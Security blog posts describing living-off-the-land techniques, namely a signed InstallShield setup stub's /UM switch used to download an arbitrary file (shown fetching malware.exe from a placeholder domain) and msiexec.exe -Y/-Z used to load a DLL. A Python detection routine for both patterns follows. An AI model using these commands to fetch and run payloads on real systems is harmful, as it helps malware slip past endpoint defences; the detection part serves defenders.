
Using signed Installshield installers as downloaders

June 2, 2019 in Anti-Forensics, EDR, Living off the land, LOLBins, Reusigned Binaries

Most modern InstallShield setup programs are wrappers around an MSI package. The task of launching the installation wizard is delegated to a setup.exe stub that is bundled with the file.

The stub accepts the command line arguments shown below:

  • /L language ID
  • /S Hide the initialization dialog.
  • /V parameters passed to MsiExec.exe
  • /UA[url to InstMsiA.exe]
  • /UW[url to InstMsiW.exe]
  • /UM[url to msi package]
  • /US[url to IsScript.msi]

Not all setup.exe files I tested accept all these arguments, or perhaps I didn’t know how to properly use them. It’s actually a bit of a mess: this file [PDF warning] lists many InstallShield command line arguments, and while it covers many versions of the program, many of these switches require a lot of trial and error, and most won’t work. You can either try your luck or, better yet, reverse the particular version of the InstallShield stub you have. In any case, sometimes we may get lucky, as I was with the /UM[URL] command line argument, which I successfully tested on an older InstallShield installer for ACDSee software (from 2010).

Running the following command will make the setup program download a file of your choice and place it in a %TEMP%\_is-<random> folder on your system:

setup.exe /umhxxp://www.[somedomain].com/malware.exe /s

The command uses “/S” to hide most of the GUI. Most, because once your file is downloaded and setup recognizes that it’s not a valid MSI, you will see this dialog box:

Its presence has its pros and cons. It’s good, because it pauses the setup program for a moment. Bad, because there is a GUI visible. When this dialog pops up, your .exe is already in the %TEMP%\_is-<random> directory and you can fetch it. Once you click OK, all files in that temporary folder are deleted.

Not the most elegant solution for downloading files, but well… it’s just yet another option.

msiexec.exe as a LOLBIN

May 29, 2019 in EDR, Living off the land, LOLBins


As Oddvarmoe pointed out, it was described before by Philip Tsukerman. Thanks!

Update #2

It looks like this technique was described even earlier by Stefan Kanthak on his excellent Sentinel page.

Old Post

This is just a quick note. Not sure if anyone pointed it out before, but msiexec.exe can work as a replacement for rundll32.exe.


msiexec.exe -Z <your DLL>
msiexec.exe -Y <your DLL>

That’s it!
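From the defender’s side, both posts describe command lines that are easy to spot in process-creation telemetry: msiexec.exe handed a DLL via -Y/-Z, and an InstallShield stub handed a URL glued to /UA, /UW, /UM or /US. The following Python triage routine is an added example, not code from the original posts; the events it runs over are constructed samples, and the file paths and URL in them are placeholders.

```python
"""Triage process-creation events for the two patterns described above:
msiexec.exe loading a DLL via -Y/-Z, and an InstallShield stub fetching a URL via /U?<url>."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample events (not real telemetry); "image" is the process path.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\bob\Downloads\tool.msi /qn"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe -Z C:\Users\bob\AppData\Local\Temp\payload.dll"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /y "C:\Program Files\Vendor\reg.dll"'},
    {"image": r"C:\Users\bob\Downloads\setup.exe",
     "cmdline": r"setup.exe /umhttp://files.example.invalid/update.exe /s"},
    {"image": r"C:\Users\bob\Downloads\setup.exe",
     "cmdline": r'setup.exe /s /v"/qn"'},
]

_TOKEN = re.compile(r'"[^"]*"|\S+')

def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted spans together."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]

def check_msiexec(tokens: List[str]) -> Optional[str]:
    """-Y/-Z (msiexec also takes /Y, /Z; case-insensitive) hand a DLL to msiexec like rundll32."""
    for i in range(1, len(tokens) - 1):
        if re.fullmatch(r"[-/][yz]", tokens[i], re.IGNORECASE):
            return f"msiexec DLL load via {tokens[i]}: {tokens[i + 1]}"
    return None

def check_installshield(tokens: List[str]) -> Optional[str]:
    """/UA, /UW, /UM or /US glued to a URL makes the stub download that file into %TEMP%."""
    for tok in tokens[1:]:
        m = re.fullmatch(r"[-/]U([AWMS])(https?://\S+)", tok, re.IGNORECASE)
        if m:
            return f"InstallShield /U{m.group(1).upper()} download from {m.group(2)}"
    return None

def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (command line, reason) for every event matching either pattern."""
    findings = []
    for ev in events:
        tokens = tokenize(ev["cmdline"])
        if not tokens:
            continue
        if ev["image"].lower().endswith("\\msiexec.exe"):
            reason = check_msiexec(tokens)
        else:  # stubs are not always named setup.exe, so check every other image
            reason = check_installshield(tokens)
        if reason:
            findings.append((ev["cmdline"], reason))
    return findings
```

Ordinary `msiexec /i package.msi` installs and a stub run with only `/s` and `/v"..."` pass through untouched, so the three hits in the sample are the two DLL loads and the /UM download.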